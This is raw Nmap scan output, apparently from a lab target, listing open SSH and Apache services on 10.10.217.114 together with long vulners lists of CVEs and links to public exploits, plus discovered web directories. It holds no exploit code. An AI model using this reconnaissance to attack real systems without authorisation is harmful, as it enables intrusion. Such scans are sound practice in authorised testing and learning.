Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-13 13:40 UTC
Stats: 0:00:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done
Nmap scan report for ip-10-10-217-114.eu-west-1.compute.internal (10.10.217.114)
Host is up (0.0013s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:7.6p1: 
|       PRION:CVE-2019-6111     5.8     https://vulners.com/prion/PRION:CVE-2019-6111
|       EXPLOITPACK:98FE96309F9524B8C84C508837551A19    5.8     https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19 *EXPLOIT*
|       EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97    5.8     https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97 *EXPLOIT*
|       EDB-ID:46516    5.8     https://vulners.com/exploitdb/EDB-ID:46516      *EXPLOIT*
|       EDB-ID:46193    5.8     https://vulners.com/exploitdb/EDB-ID:46193      *EXPLOIT*
|       CVE-2019-6111   5.8     https://vulners.com/cve/CVE-2019-6111
|       1337DAY-ID-32328        5.8     https://vulners.com/zdt/1337DAY-ID-32328        *EXPLOIT*
|       1337DAY-ID-32009        5.8     https://vulners.com/zdt/1337DAY-ID-32009        *EXPLOIT*
|       SSH_ENUM        5.0     https://vulners.com/canvas/SSH_ENUM     *EXPLOIT*
|       PRION:CVE-2018-15919    5.0     https://vulners.com/prion/PRION:CVE-2018-15919
|       PRION:CVE-2018-15473    5.0     https://vulners.com/prion/PRION:CVE-2018-15473
|       PACKETSTORM:150621      5.0     https://vulners.com/packetstorm/PACKETSTORM:150621      *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-        5.0     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-SSH-SSH_ENUMUSERS-      *EXPLOIT*
|       EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0    5.0     https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
|       EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283    5.0     https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
|       EDB-ID:45939    5.0     https://vulners.com/exploitdb/EDB-ID:45939      *EXPLOIT*
|       CVE-2018-15919  5.0     https://vulners.com/cve/CVE-2018-15919
|       CVE-2018-15473  5.0     https://vulners.com/cve/CVE-2018-15473
|       1337DAY-ID-31730        5.0     https://vulners.com/zdt/1337DAY-ID-31730        *EXPLOIT*
|       PRION:CVE-2019-16905    4.4     https://vulners.com/prion/PRION:CVE-2019-16905
|       CVE-2020-14145  4.3     https://vulners.com/cve/CVE-2020-14145
|       PRION:CVE-2019-6110     4.0     https://vulners.com/prion/PRION:CVE-2019-6110
|       PRION:CVE-2019-6109     4.0     https://vulners.com/prion/PRION:CVE-2019-6109
|       CVE-2019-6110   4.0     https://vulners.com/cve/CVE-2019-6110
|       CVE-2019-6109   4.0     https://vulners.com/cve/CVE-2019-6109
|       PRION:CVE-2018-20685    2.6     https://vulners.com/prion/PRION:CVE-2018-20685
|       CVE-2018-20685  2.6     https://vulners.com/cve/CVE-2018-20685
|       PACKETSTORM:151227      0.0     https://vulners.com/packetstorm/PACKETSTORM:151227      *EXPLOIT*
|_      1337DAY-ID-30937        0.0     https://vulners.com/zdt/1337DAY-ID-30937        *EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.29: 
|       CVE-2019-9517   7.8     https://vulners.com/cve/CVE-2019-9517
|       PACKETSTORM:176334      7.5     https://vulners.com/packetstorm/PACKETSTORM:176334      *EXPLOIT*
|       PACKETSTORM:171631      7.5     https://vulners.com/packetstorm/PACKETSTORM:171631      *EXPLOIT*
|       OSV:BIT-APACHE-2023-25690       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2023-25690
|       OSV:BIT-APACHE-2022-31813       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-31813
|       OSV:BIT-APACHE-2022-23943       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-23943
|       OSV:BIT-APACHE-2022-22720       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2022-22720
|       OSV:BIT-APACHE-2021-44790       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-44790
|       OSV:BIT-APACHE-2021-42013       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-42013
|       OSV:BIT-APACHE-2021-41773       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-41773
|       OSV:BIT-APACHE-2021-39275       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-39275
|       OSV:BIT-APACHE-2021-26691       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-26691
|       OSV:BIT-APACHE-2020-11984       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2020-11984
|       MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-       7.5     https://vulners.com/metasploit/MSF:EXPLOIT-MULTI-HTTP-APACHE_NORMALIZE_PATH_RCE-     *EXPLOIT*
|       MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-       7.5     https://vulners.com/metasploit/MSF:AUXILIARY-SCANNER-HTTP-APACHE_NORMALIZE_PATH-     *EXPLOIT*
|       F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5    7.5     https://vulners.com/githubexploit/F9C0CD4B-3B60-5720-AE7A-7CC31DB839C5  *EXPLOIT*
|       EDB-ID:50512    7.5     https://vulners.com/exploitdb/EDB-ID:50512      *EXPLOIT*
|       EDB-ID:50446    7.5     https://vulners.com/exploitdb/EDB-ID:50446      *EXPLOIT*
|       EDB-ID:50406    7.5     https://vulners.com/exploitdb/EDB-ID:50406      *EXPLOIT*
|       E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6    7.5     https://vulners.com/githubexploit/E796A40A-8A8E-59D1-93FB-78EF4D8B7FA6  *EXPLOIT*
|       CVE-2023-25690  7.5     https://vulners.com/cve/CVE-2023-25690
|       CVE-2022-31813  7.5     https://vulners.com/cve/CVE-2022-31813
|       CVE-2022-23943  7.5     https://vulners.com/cve/CVE-2022-23943
|       CVE-2022-22720  7.5     https://vulners.com/cve/CVE-2022-22720
|       CVE-2021-44790  7.5     https://vulners.com/cve/CVE-2021-44790
|       CVE-2021-39275  7.5     https://vulners.com/cve/CVE-2021-39275
|       CVE-2021-26691  7.5     https://vulners.com/cve/CVE-2021-26691
|       CNVD-2022-73123 7.5     https://vulners.com/cnvd/CNVD-2022-73123
|       CNVD-2022-03225 7.5     https://vulners.com/cnvd/CNVD-2022-03225
|       CNVD-2021-102386        7.5     https://vulners.com/cnvd/CNVD-2021-102386
|       CC15AE65-B697-525A-AF4B-38B1501CAB49    7.5     https://vulners.com/githubexploit/CC15AE65-B697-525A-AF4B-38B1501CAB49  *EXPLOIT*
|       9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5    7.5     https://vulners.com/githubexploit/9B4F4E4A-CFDF-5847-805F-C0BAE809DBD5  *EXPLOIT*
|       8713FD59-264B-5FD7-8429-3251AB5AB3B8    7.5     https://vulners.com/githubexploit/8713FD59-264B-5FD7-8429-3251AB5AB3B8  *EXPLOIT*
|       6A0A657E-8300-5312-99CE-E11F460B1DBF    7.5     https://vulners.com/githubexploit/6A0A657E-8300-5312-99CE-E11F460B1DBF  *EXPLOIT*
|       61075B23-F713-537A-9B84-7EB9B96CF228    7.5     https://vulners.com/githubexploit/61075B23-F713-537A-9B84-7EB9B96CF228  *EXPLOIT*
|       5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9    7.5     https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9  *EXPLOIT*
|       5312D04F-9490-5472-84FA-86B3BBDC8928    7.5     https://vulners.com/githubexploit/5312D04F-9490-5472-84FA-86B3BBDC8928  *EXPLOIT*
|       52E13088-9643-5E81-B0A0-B7478BCF1F2C    7.5     https://vulners.com/githubexploit/52E13088-9643-5E81-B0A0-B7478BCF1F2C  *EXPLOIT*
|       3F17CA20-788F-5C45-88B3-E12DB2979B7B    7.5     https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B  *EXPLOIT*
|       22DCCD26-B68C-5905-BAC2-71D10DE3F123    7.5     https://vulners.com/githubexploit/22DCCD26-B68C-5905-BAC2-71D10DE3F123  *EXPLOIT*
|       2108729F-1E99-54EF-9A4B-47299FD89FF2    7.5     https://vulners.com/githubexploit/2108729F-1E99-54EF-9A4B-47299FD89FF2  *EXPLOIT*
|       1337DAY-ID-39214        7.5     https://vulners.com/zdt/1337DAY-ID-39214        *EXPLOIT*
|       1337DAY-ID-38427        7.5     https://vulners.com/zdt/1337DAY-ID-38427        *EXPLOIT*
|       1337DAY-ID-37777        7.5     https://vulners.com/zdt/1337DAY-ID-37777        *EXPLOIT*
|       1337DAY-ID-36952        7.5     https://vulners.com/zdt/1337DAY-ID-36952        *EXPLOIT*
|       1337DAY-ID-34882        7.5     https://vulners.com/zdt/1337DAY-ID-34882        *EXPLOIT*
|       EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB    7.2     https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB *EXPLOIT*
|       EDB-ID:46676    7.2     https://vulners.com/exploitdb/EDB-ID:46676      *EXPLOIT*
|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211
|       1337DAY-ID-32502        7.2     https://vulners.com/zdt/1337DAY-ID-32502        *EXPLOIT*
|       OSV:BIT-APACHE-2021-40438       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2021-40438
|       OSV:BIT-APACHE-2020-35452       6.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-35452
|       FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8    6.8     https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8  *EXPLOIT*
|       CVE-2021-40438  6.8     https://vulners.com/cve/CVE-2021-40438
|       CVE-2020-35452  6.8     https://vulners.com/cve/CVE-2020-35452
|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312
|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715
|       CNVD-2022-03224 6.8     https://vulners.com/cnvd/CNVD-2022-03224
|       AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C    6.8     https://vulners.com/githubexploit/AE3EF1CC-A0C3-5CB7-A6EF-4DAAAFA59C8C  *EXPLOIT*
|       8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2    6.8     https://vulners.com/githubexploit/8AFB43C5-ABD4-52AD-BB19-24D7884FF2A2  *EXPLOIT*
|       4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332    6.8     https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332  *EXPLOIT*
|       4373C92A-2755-5538-9C91-0469C995AA9B    6.8     https://vulners.com/githubexploit/4373C92A-2755-5538-9C91-0469C995AA9B  *EXPLOIT*
|       36618CA8-9316-59CA-B748-82F15F407C4F    6.8     https://vulners.com/githubexploit/36618CA8-9316-59CA-B748-82F15F407C4F  *EXPLOIT*
|       0095E929-7573-5E4A-A7FA-F6598A35E8DE    6.8     https://vulners.com/githubexploit/0095E929-7573-5E4A-A7FA-F6598A35E8DE  *EXPLOIT*
|       OSV:BIT-APACHE-2022-28615       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2022-28615
|       OSV:BIT-APACHE-2021-44224       6.4     https://vulners.com/osv/OSV:BIT-APACHE-2021-44224
|       OSV:BIT-2023-31122      6.4     https://vulners.com/osv/OSV:BIT-2023-31122
|       CVE-2022-28615  6.4     https://vulners.com/cve/CVE-2022-28615
|       CVE-2021-44224  6.4     https://vulners.com/cve/CVE-2021-44224
|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082
|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217
|       OSV:BIT-APACHE-2022-22721       5.8     https://vulners.com/osv/OSV:BIT-APACHE-2022-22721
|       OSV:BIT-APACHE-2020-1927        5.8     https://vulners.com/osv/OSV:BIT-APACHE-2020-1927
|       CVE-2022-22721  5.8     https://vulners.com/cve/CVE-2022-22721
|       CVE-2020-1927   5.8     https://vulners.com/cve/CVE-2020-1927
|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098
|       1337DAY-ID-33577        5.8     https://vulners.com/zdt/1337DAY-ID-33577        *EXPLOIT*
|       OSV:BIT-APACHE-2022-36760       5.1     https://vulners.com/osv/OSV:BIT-APACHE-2022-36760
|       CVE-2022-36760  5.1     https://vulners.com/cve/CVE-2022-36760
|       OSV:BIT-APACHE-2023-45802       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-45802
|       OSV:BIT-APACHE-2023-43622       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-43622
|       OSV:BIT-APACHE-2023-31122       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-31122
|       OSV:BIT-APACHE-2023-27522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2023-27522
|       OSV:BIT-APACHE-2022-37436       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-37436
|       OSV:BIT-APACHE-2022-30556       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30556
|       OSV:BIT-APACHE-2022-30522       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-30522
|       OSV:BIT-APACHE-2022-29404       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-29404
|       OSV:BIT-APACHE-2022-28614       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28614
|       OSV:BIT-APACHE-2022-28330       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-28330
|       OSV:BIT-APACHE-2022-26377       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-26377
|       OSV:BIT-APACHE-2022-22719       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2022-22719
|       OSV:BIT-APACHE-2021-41524       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-41524
|       OSV:BIT-APACHE-2021-36160       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-36160
|       OSV:BIT-APACHE-2021-34798       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-34798
|       OSV:BIT-APACHE-2021-33193       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-33193
|       OSV:BIT-APACHE-2021-31618       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
|       OSV:BIT-APACHE-2021-30641       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-30641
|       OSV:BIT-APACHE-2021-26690       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2021-26690
|       OSV:BIT-APACHE-2020-9490        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-9490
|       OSV:BIT-APACHE-2020-1934        5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-1934
|       OSV:BIT-APACHE-2020-13950       5.0     https://vulners.com/osv/OSV:BIT-APACHE-2020-13950
|       OSV:BIT-2023-45802      5.0     https://vulners.com/osv/OSV:BIT-2023-45802
|       OSV:BIT-2023-43622      5.0     https://vulners.com/osv/OSV:BIT-2023-43622
|       F7F6E599-CEF4-5E03-8E10-FE18C4101E38    5.0     https://vulners.com/githubexploit/F7F6E599-CEF4-5E03-8E10-FE18C4101E38  *EXPLOIT*
|       E5C174E5-D6E8-56E0-8403-D287DE52EB3F    5.0     https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F  *EXPLOIT*
|       DB6E1BBD-08B1-574D-A351-7D6BB9898A4A    5.0     https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A  *EXPLOIT*
|       CVE-2023-31122  5.0     https://vulners.com/cve/CVE-2023-31122
|       CVE-2022-37436  5.0     https://vulners.com/cve/CVE-2022-37436
|       CVE-2022-30556  5.0     https://vulners.com/cve/CVE-2022-30556
|       CVE-2022-29404  5.0     https://vulners.com/cve/CVE-2022-29404
|       CVE-2022-28614  5.0     https://vulners.com/cve/CVE-2022-28614
|       CVE-2022-26377  5.0     https://vulners.com/cve/CVE-2022-26377
|       CVE-2022-22719  5.0     https://vulners.com/cve/CVE-2022-22719
|       CVE-2021-34798  5.0     https://vulners.com/cve/CVE-2021-34798
|       CVE-2021-33193  5.0     https://vulners.com/cve/CVE-2021-33193
|       CVE-2021-26690  5.0     https://vulners.com/cve/CVE-2021-26690
|       CVE-2020-9490   5.0     https://vulners.com/cve/CVE-2020-9490
|       CVE-2020-1934   5.0     https://vulners.com/cve/CVE-2020-1934
|       CVE-2019-17567  5.0     https://vulners.com/cve/CVE-2019-17567
|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081
|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220
|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196
|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199
|       CVE-2018-17189  5.0     https://vulners.com/cve/CVE-2018-17189
|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333
|       CVE-2018-1303   5.0     https://vulners.com/cve/CVE-2018-1303
|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710
|       CVE-2006-20001  5.0     https://vulners.com/cve/CVE-2006-20001
|       CNVD-2023-93320 5.0     https://vulners.com/cnvd/CNVD-2023-93320
|       CNVD-2023-80558 5.0     https://vulners.com/cnvd/CNVD-2023-80558
|       CNVD-2022-73122 5.0     https://vulners.com/cnvd/CNVD-2022-73122
|       CNVD-2022-53584 5.0     https://vulners.com/cnvd/CNVD-2022-53584
|       CNVD-2022-53582 5.0     https://vulners.com/cnvd/CNVD-2022-53582
|       CNVD-2022-03223 5.0     https://vulners.com/cnvd/CNVD-2022-03223
|       C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B    5.0     https://vulners.com/githubexploit/C9A1C0C1-B6E3-5955-A4F1-DEA0E505B14B  *EXPLOIT*
|       BD3652A9-D066-57BA-9943-4E34970463B9    5.0     https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9  *EXPLOIT*
|       B0208442-6E17-5772-B12D-B5BE30FA5540    5.0     https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540  *EXPLOIT*
|       A820A056-9F91-5059-B0BC-8D92C7A31A52    5.0     https://vulners.com/githubexploit/A820A056-9F91-5059-B0BC-8D92C7A31A52  *EXPLOIT*
|       9814661A-35A4-5DB7-BB25-A1040F365C81    5.0     https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81  *EXPLOIT*
|       5A864BCC-B490-5532-83AB-2E4109BB3C31    5.0     https://vulners.com/githubexploit/5A864BCC-B490-5532-83AB-2E4109BB3C31  *EXPLOIT*
|       17C6AD2A-8469-56C8-BBBE-1764D0DF1680    5.0     https://vulners.com/githubexploit/17C6AD2A-8469-56C8-BBBE-1764D0DF1680  *EXPLOIT*
|       OSV:BIT-APACHE-2020-11993       4.3     https://vulners.com/osv/OSV:BIT-APACHE-2020-11993
|       FF610CB4-801A-5D1D-9AC9-ADFC287C8482    4.3     https://vulners.com/githubexploit/FF610CB4-801A-5D1D-9AC9-ADFC287C8482  *EXPLOIT*
|       FDF4BBB1-979C-5320-95EA-9EC7EB064D72    4.3     https://vulners.com/githubexploit/FDF4BBB1-979C-5320-95EA-9EC7EB064D72  *EXPLOIT*
|       FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46    4.3     https://vulners.com/githubexploit/FCAF01A0-F921-5DB1-BBC5-850EC2DC5C46  *EXPLOIT*
|       EDB-ID:50383    4.3     https://vulners.com/exploitdb/EDB-ID:50383      *EXPLOIT*
|       E7B177F6-FA62-52FE-A108-4B8FC8112B7F    4.3     https://vulners.com/githubexploit/E7B177F6-FA62-52FE-A108-4B8FC8112B7F  *EXPLOIT*
|       E6B39247-8016-5007-B505-699F05FCA1B5    4.3     https://vulners.com/githubexploit/E6B39247-8016-5007-B505-699F05FCA1B5  *EXPLOIT*
|       DBF996C3-DC2A-5859-B767-6B2FC38F2185    4.3     https://vulners.com/githubexploit/DBF996C3-DC2A-5859-B767-6B2FC38F2185  *EXPLOIT*
|       D0E79214-C9E8-52BD-BC24-093970F5F34E    4.3     https://vulners.com/githubexploit/D0E79214-C9E8-52BD-BC24-093970F5F34E  *EXPLOIT*
|       CVE-2020-11993  4.3     https://vulners.com/cve/CVE-2020-11993
|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092
|       CVE-2018-1302   4.3     https://vulners.com/cve/CVE-2018-1302
|       CVE-2018-1301   4.3     https://vulners.com/cve/CVE-2018-1301
|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763
|       CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE    4.3     https://vulners.com/githubexploit/CF47F8BF-37F7-5EF9-ABAB-E88ECF6B64FE  *EXPLOIT*
|       CD48BD40-E52A-5A8B-AE27-B57C358BB0EE    4.3     https://vulners.com/githubexploit/CD48BD40-E52A-5A8B-AE27-B57C358BB0EE  *EXPLOIT*
|       C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79    4.3     https://vulners.com/githubexploit/C8C7BBD4-C089-5DA7-8474-A5B2B7DC5E79  *EXPLOIT*
|       C8799CA3-C88C-5B39-B291-2895BE0D9133    4.3     https://vulners.com/githubexploit/C8799CA3-C88C-5B39-B291-2895BE0D9133  *EXPLOIT*
|       C0380E16-C468-5540-A427-7FE34E7CF36B    4.3     https://vulners.com/githubexploit/C0380E16-C468-5540-A427-7FE34E7CF36B  *EXPLOIT*
|       BC027F41-02AD-5D71-A452-4DD62B0F1EE1    4.3     https://vulners.com/githubexploit/BC027F41-02AD-5D71-A452-4DD62B0F1EE1  *EXPLOIT*
|       B946B2A1-2914-537A-BF26-94B48FC501B3    4.3     https://vulners.com/githubexploit/B946B2A1-2914-537A-BF26-94B48FC501B3  *EXPLOIT*
|       B9151905-5395-5622-B789-E16B88F30C71    4.3     https://vulners.com/githubexploit/B9151905-5395-5622-B789-E16B88F30C71  *EXPLOIT*
|       B58E6202-6D04-5CB0-8529-59713C0E13B8    4.3     https://vulners.com/githubexploit/B58E6202-6D04-5CB0-8529-59713C0E13B8  *EXPLOIT*
|       B53D7077-1A2B-5640-9581-0196F6138301    4.3     https://vulners.com/githubexploit/B53D7077-1A2B-5640-9581-0196F6138301  *EXPLOIT*
|       A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F    4.3     https://vulners.com/githubexploit/A9C7FB0F-65EC-5557-B6E8-6AFBBF8F140F  *EXPLOIT*
|       9EE3F7E3-70E6-503E-9929-67FE3F3735A2    4.3     https://vulners.com/githubexploit/9EE3F7E3-70E6-503E-9929-67FE3F3735A2  *EXPLOIT*
|       9D511461-7D24-5402-8E2A-58364D6E758F    4.3     https://vulners.com/githubexploit/9D511461-7D24-5402-8E2A-58364D6E758F  *EXPLOIT*
|       9CEA663C-6236-5F45-B207-A873B971F988    4.3     https://vulners.com/githubexploit/9CEA663C-6236-5F45-B207-A873B971F988  *EXPLOIT*
|       987C6FDB-3E70-5FF5-AB5B-D50065D27594    4.3     https://vulners.com/githubexploit/987C6FDB-3E70-5FF5-AB5B-D50065D27594  *EXPLOIT*
|       789B6112-E84C-566E-89A7-82CC108EFCD9    4.3     https://vulners.com/githubexploit/789B6112-E84C-566E-89A7-82CC108EFCD9  *EXPLOIT*
|       788F7DF8-01F3-5D13-9B3E-E4AA692153E6    4.3     https://vulners.com/githubexploit/788F7DF8-01F3-5D13-9B3E-E4AA692153E6  *EXPLOIT*
|       749F952B-3ACF-56B2-809D-D66E756BE839    4.3     https://vulners.com/githubexploit/749F952B-3ACF-56B2-809D-D66E756BE839  *EXPLOIT*
|       6E484197-456B-55DF-8D51-C2BB4925F45C    4.3     https://vulners.com/githubexploit/6E484197-456B-55DF-8D51-C2BB4925F45C  *EXPLOIT*
|       68E78C64-D93A-5E8B-9DEA-4A8D826B474E    4.3     https://vulners.com/githubexploit/68E78C64-D93A-5E8B-9DEA-4A8D826B474E  *EXPLOIT*
|       6758CFA9-271A-5E99-A590-E51F4E0C5046    4.3     https://vulners.com/githubexploit/6758CFA9-271A-5E99-A590-E51F4E0C5046  *EXPLOIT*
|       674BA200-C494-57E6-B1B4-1672DDA15D3C    4.3     https://vulners.com/githubexploit/674BA200-C494-57E6-B1B4-1672DDA15D3C  *EXPLOIT*
|       5A54F5DA-F9C1-508B-AD2D-3E45CD647D31    4.3     https://vulners.com/githubexploit/5A54F5DA-F9C1-508B-AD2D-3E45CD647D31  *EXPLOIT*
|       4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F    4.3     https://vulners.com/githubexploit/4E5A5BA8-3BAF-57F0-B71A-F04B4D066E4F  *EXPLOIT*
|       4C79D8E5-D595-5460-AA84-18D4CB93E8FC    4.3     https://vulners.com/githubexploit/4C79D8E5-D595-5460-AA84-18D4CB93E8FC  *EXPLOIT*
|       4B44115D-85A3-5E62-B9A8-5F336C24673F    4.3     https://vulners.com/githubexploit/4B44115D-85A3-5E62-B9A8-5F336C24673F  *EXPLOIT*
|       4013EC74-B3C1-5D95-938A-54197A58586D    4.3     https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D  *EXPLOIT*
|       3CF66144-235E-5F7A-B889-113C11ABF150    4.3     https://vulners.com/githubexploit/3CF66144-235E-5F7A-B889-113C11ABF150  *EXPLOIT*
|       379FCF38-0B4A-52EC-BE3E-408A0467BF20    4.3     https://vulners.com/githubexploit/379FCF38-0B4A-52EC-BE3E-408A0467BF20  *EXPLOIT*
|       365CD0B0-D956-59D6-9500-965BF4017E2D    4.3     https://vulners.com/githubexploit/365CD0B0-D956-59D6-9500-965BF4017E2D  *EXPLOIT*
|       2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F    4.3     https://vulners.com/githubexploit/2E98EA81-24D1-5D5B-80B9-A8D616BF3C3F  *EXPLOIT*
|       2B4FEB27-377B-557B-AE46-66D677D5DA1C    4.3     https://vulners.com/githubexploit/2B4FEB27-377B-557B-AE46-66D677D5DA1C  *EXPLOIT*
|       1B75F2E2-5B30-58FA-98A4-501B91327D7F    4.3     https://vulners.com/githubexploit/1B75F2E2-5B30-58FA-98A4-501B91327D7F  *EXPLOIT*
|       1337DAY-ID-35422        4.3     https://vulners.com/zdt/1337DAY-ID-35422        *EXPLOIT*
|       1337DAY-ID-33575        4.3     https://vulners.com/zdt/1337DAY-ID-33575        *EXPLOIT*
|       1145F3D1-0ECB-55AA-B25D-A26892116505    4.3     https://vulners.com/githubexploit/1145F3D1-0ECB-55AA-B25D-A26892116505  *EXPLOIT*
|       108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2    4.3     https://vulners.com/githubexploit/108A0713-4AB8-5A1F-A16B-4BB13ECEC9B2  *EXPLOIT*
|       0BC014D0-F944-5E78-B5FA-146A8E5D0F8A    4.3     https://vulners.com/githubexploit/0BC014D0-F944-5E78-B5FA-146A8E5D0F8A  *EXPLOIT*
|       06076ECD-3FB7-53EC-8572-ABBB20029812    4.3     https://vulners.com/githubexploit/06076ECD-3FB7-53EC-8572-ABBB20029812  *EXPLOIT*
|       05403438-4985-5E78-A702-784E03F724D4    4.3     https://vulners.com/githubexploit/05403438-4985-5E78-A702-784E03F724D4  *EXPLOIT*
|       00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08    4.3     https://vulners.com/githubexploit/00EC8F03-D8A3-56D4-9F8C-8DD1F5ACCA08  *EXPLOIT*
|       CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283
|       CVE-2023-45802  2.6     https://vulners.com/cve/CVE-2023-45802
|       OSV:BIT-APACHE-2020-13938       2.1     https://vulners.com/osv/OSV:BIT-APACHE-2020-13938
|_      PACKETSTORM:152441      0.0     https://vulners.com/packetstorm/PACKETSTORM:152441      *EXPLOIT*
| http-enum: 
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /downloads/: Potentially interesting folder
|_  /img/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-csrf: Couldn't find any CSRF vulnerabilities.
2222/tcp open  ssh     OpenSSH 8.2p1 Debian 4 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|       PRION:CVE-2020-15778    6.8     https://vulners.com/prion/PRION:CVE-2020-15778
|       CVE-2020-15778  6.8     https://vulners.com/cve/CVE-2020-15778
|       C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3    6.8     https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3  *EXPLOIT*
|       10213DBE-F683-58BB-B6D3-353173626207    6.8     https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207  *EXPLOIT*
|       PRION:CVE-2020-12062    5.0     https://vulners.com/prion/PRION:CVE-2020-12062
|       CVE-2020-12062  5.0     https://vulners.com/cve/CVE-2020-12062
